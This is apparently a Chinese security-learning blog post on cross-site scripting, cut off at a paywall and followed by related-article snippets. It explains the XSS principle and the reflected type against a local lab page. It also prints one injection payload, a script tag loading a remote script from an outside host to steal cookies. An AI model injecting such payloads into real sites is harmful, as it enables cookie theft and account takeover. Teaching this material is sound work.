XSS跨站脚本漏洞详解

最新推荐文章于 2025-03-25 09:46:45 发布
最新推荐文章于 2025-03-25 09:46:45 发布
阅读量528 收藏 2
点赞数
分类专栏: 网络安全学习 文章标签: javascript xss web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ZripenYe/article/details/119671961
版权

本文参考资料:《Web安全深度剖析》张炳帅

  • 跨站脚本漏洞:2017年OWASP TOP 7
  • XSS又叫CSS(Cross Site Scripting),但是和指层叠样式表 (Cascading Style Sheets) 缩写重名,所以叫XSS
  • XSS是指攻击者在网页中嵌入脚本代码,通常是JavaScript代码,当用户使用浏览器看这些已经被嵌入恶意代码的网页的时候,这些代码就会执行,进行攻击。
  • XSS 属于客户端的攻击,但是中间体是服务器,并且可以当作入侵服务器的跳板:比如管理员执行了恶意代码,获取到管理员的Cookie,就可以绕过登录验证

XSS原理

  • 原理就是嵌入恶意代码,然后等待被攻击方的执行
    比如下面是一个url连接,我在url链接下输入script代码,就会有弹窗提醒:
    在这里插入图片描述
    在这里插入图片描述
    弹窗只是一个验证过程:不仅仅是弹窗:如果我在其中加入一个链接,而这个链接刚好指向的是我要执行的JavaScript脚本,那么这个脚本就会在客户端进行执行了,比如我输入:
<script src="http://www.abc.com/a.php"></script>

如果这个代码注入到注入点,那么在用户浏览网页的时候,这个a.php就会被执行,具体功能根据a.php的内容,可以是窃取Cookie、可以是监控等等。

XSS类型:

XSS有三种类型:反射型、存储型和DOM型。

反射型XSS

  • 反射型XSS也称为非持久型XSS,是最容易出现的XSS漏洞。
  • 客户访问带有XSS的URL链接——服务器端接收数据处理——把有XSS代码的数据发送到浏览器——浏览器解析这段XSS代码——造成XSS漏洞。这个过程就像反射,所以叫反射型XSS。

还是刚才的靶场,刚才靶场的url链接是:http://127.0.0.1/xsslabs/level1.php?name=test,在name的后面有一个test值,我们更改test值为XSS恶意代码就能够进行攻击:

http://127.0.0.1/xsslabs/level1.php?name=<script>.......</script>

这种招式看似好像非得用户点击我们篡改的URL才能达成攻击效果,也确实是这样,但是不懂XSS攻击的人居多,利用一些社会工程学就可以执行XSS代码。<

最低0.47元/天 解锁文章
WEB漏洞——XSS
zybaiiiiii的博客
02-11 944
xss全称跨站脚本攻击(Cross-Site scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为xssxss是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到web网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会遭受xss攻击。xss漏洞防御的总体思路是,采用“对输入进行过滤”和“输出进行转义”的方式进行处理: 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入; 输出转义:根据输出点
XSS漏洞
weixin_54475242的博客
03-20 639
XSS漏洞 XSS漏洞 十大漏洞之一 Xss被称为跨站脚本攻击,xss通过将精心构造的代码(JS)代码注入到网页,并由浏览器解释运行这段JS代码,达到恶意攻击的效果。当用户访问被XSS脚本注入的网页,XSS脚本就会被提取出来。用户浏览器就会解析这段XSS代码,也就是说用户被攻击了。 XSS的对象是用户和浏览器。微博,留言板,聊天室等等收集用户输入的地方,都有可能被注入XSS代码,都存在遭受XSS的风险,只要没有对用户的输入进行严格过滤,就会被XSS。 攻击者将恶意代码注入到服务器中 用户在没有防备的情况下
XSS漏洞简介、危害与分类及验证
最新发布
Python84310366的博客
03-25 1126
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript
如何检测网站是否存在XSS跨站漏洞
atwfz46402的专栏
07-05 3647
为了防止发生XSS, 很多浏览器厂商都在浏览器中加入安全机制来过滤XSS。 例如IE8,IE9,Firefox, Chrome. 都有针对XSS的安全机制。 浏览器会阻止XSS。最好使用ie7来测试。 方法一: 查看代码,查找关键的变量, 客户端将数据传送给Web 服务端一般通过三种方式 Querystring, Form表单,以及cookie. 例如在ASP的程序中,通过...
Xss漏洞检测
continue my dream
09-04 3017
1. 实验目的: 通过检测网站是否存在Xss漏洞,了解Xss漏洞的原理及检测步骤,维护网站的安全。 2. 实验环境: 任意网络浏览器 3. 实验原理: (1) XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。XSS
XSS 漏洞验证的方式
weixin_33726318的博客
07-27 1991
2019独角兽企业重金招聘Python工程师标准>>> ...
跨站脚本漏洞测试流程
安全界的彭于晏的博客
06-29 569
1.在目标站点上找到输入点,比如查询接口,留言板等; 2.输入一组’‘特殊字符+唯一识别字符’,点击提交后,查看返回的原码.是否有做对应的处理 3.通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行js的条件(构造闭合) 4.提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞 TIPS: 1.一般查询接口容易出现反射型XSS,留言板容易出现存储型XSS; 2.由于后台可能存在过滤措施,构造的script可能会被过滤掉,而无法生效,或者环境限制了执行(浏
XSS跨站脚本漏洞简介、原理及防护方法
m0_54899775的博客
03-21 8027
XSS跨站脚本漏洞简介、原理及防护方法 XSS跨站漏洞原理及防护
网络攻防-XSS跨站脚本攻击详解及其防范
10-31
内容概要:本文详细阐述了跨站脚本XSS)攻击的基本原理、攻击类型、可能引发的危害以及防范措施。首先介绍了XSS的概念及原理,包括恶意脚本是如何利用网页漏洞在用户浏览器中运行的。接着解释了三种主要的XSS攻击...
xss跨站脚本攻击详解
06-08
### XSS跨站脚本攻击详解 #### 一、XSS攻击概述 XSS攻击,全称为**跨站脚本攻击**(Cross Site Scripting),是一种常见的网络安全漏洞,它发生在Web应用程序未能正确过滤用户输入的数据时。攻击者可以借此机会将...
【网络安全之XSS跨站脚本攻击漏洞详解
Flipped_Move的博客
01-20 1198
XSS跨站脚本攻击原称CSS,但为了与层叠样式表CSS区分所以称为XSS。主要是指攻击者在web页面插入恶意的script代码,当用户浏览该页面之时,嵌入其中的script代码会被执行,然后获取用户cookie、或者用户在网页中其他的高级权限以及其他隐私,从而达到恶意攻击用户的目的。主要产生于前端的JavaScript代码中。
xss与cookie漏洞验证工具
08-25
xss与cookie漏洞验证工具
brutexss一款快速验证存在xss漏洞
05-07
brutexss让安全工程师快速验证页面是否存在brutexss漏洞,使用简单方便,字典强大,自带xss漏洞验证语法,一条指令就可以验证xss漏洞是否存在以及注入方式
XSS漏洞挖掘与验证
weixin_42109829的博客
12-04 1606
挖掘的方法: 1、手工挖掘 方法:靠闭合标签加一些限制绕过等等的 标签闭合配合浏览器的测试,因为有时候提交的那些表单里面是限制长度的,所以我们可以: (1)用bp进行抓包改包,进行探测。 (2)直接在前端修改源代码进行修改长度限制。 挖掘验证思路: 1、先找数据交互的地方 用户输入点、输出点、文件上传地方、flash、在url当中,get的地方,有注入的 地方,这...
XSS漏洞检测手段
Kevin's Blog
05-05 9405
文章目录一、手工注入检测1.1 Cheat Sheet二、自动化工具检测2.1 BurpSuite之XSS Validator2.1.1 运行原理2.1.2 插件安装2.1.3 phantomjs安装2.1.4 下载xss.js2.1.5 配置XSS Validator2.1.6 配置Intruder模块2.1.7 XSS漏洞检测2.1.8 工具优缺点2.2 神器之XSSer2.2.1 工具介绍 ...
跨站脚本漏洞-XSS
夜行者的博客
02-18 1813
xss攻击是指利用网页的漏洞注入恶意的指令代码到网页,使得用户加载并执行攻击者恶意制造的网页程序,XSS攻击可以窃取cookie从而获得用户的账号和个人信息,网站挂马,有限的键盘信息,发送广告和垃圾短息。 XSS漏洞分为三种,存储型,反射型和DOM型。 检测方法: 1.通过扫描工具appscan或者burpsuite工具扫描,查看与验证扫描结果中的XSS漏洞 2.反射型XSS,在请求的url的参数后面拼接XSS脚本,看是否能正常执行 3.存储型XSS,在保存数据的时候输入XSS脚本,检查数据是否能
XSS漏洞03】XSS漏洞验证、语句构造与绕过方法
热门推荐
Fighting_hawk的博客
02-24 1万+
1. 了解漏洞验证相关概念含义; 2. 掌握XSS漏洞验证的方法; 3. 掌握XSS语句构造的5种方法; 4. 掌握XSS语句绕过的8种方法。
【精选】【XSS漏洞03】XSS漏洞验证、语句构造与绕过方法
zzz6583zz的博客
06-12 833
了解漏洞验证相关概念含义;掌握XSS漏洞验证的方法;掌握XSS语句构造的5种方法;掌握XSS语句绕过的8种方法。
XSS跨站脚本攻击详解与防御策略
"该资源主要介绍了XSS跨站脚本攻击的相关知识,包括攻击的定义、类型、漏洞挖掘以及防范措施。此外,还探讨了Web安全的三个主要目标:保护Web服务器及其数据的安全、保护信息传递的安全以及保护终端用户设备的安全。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值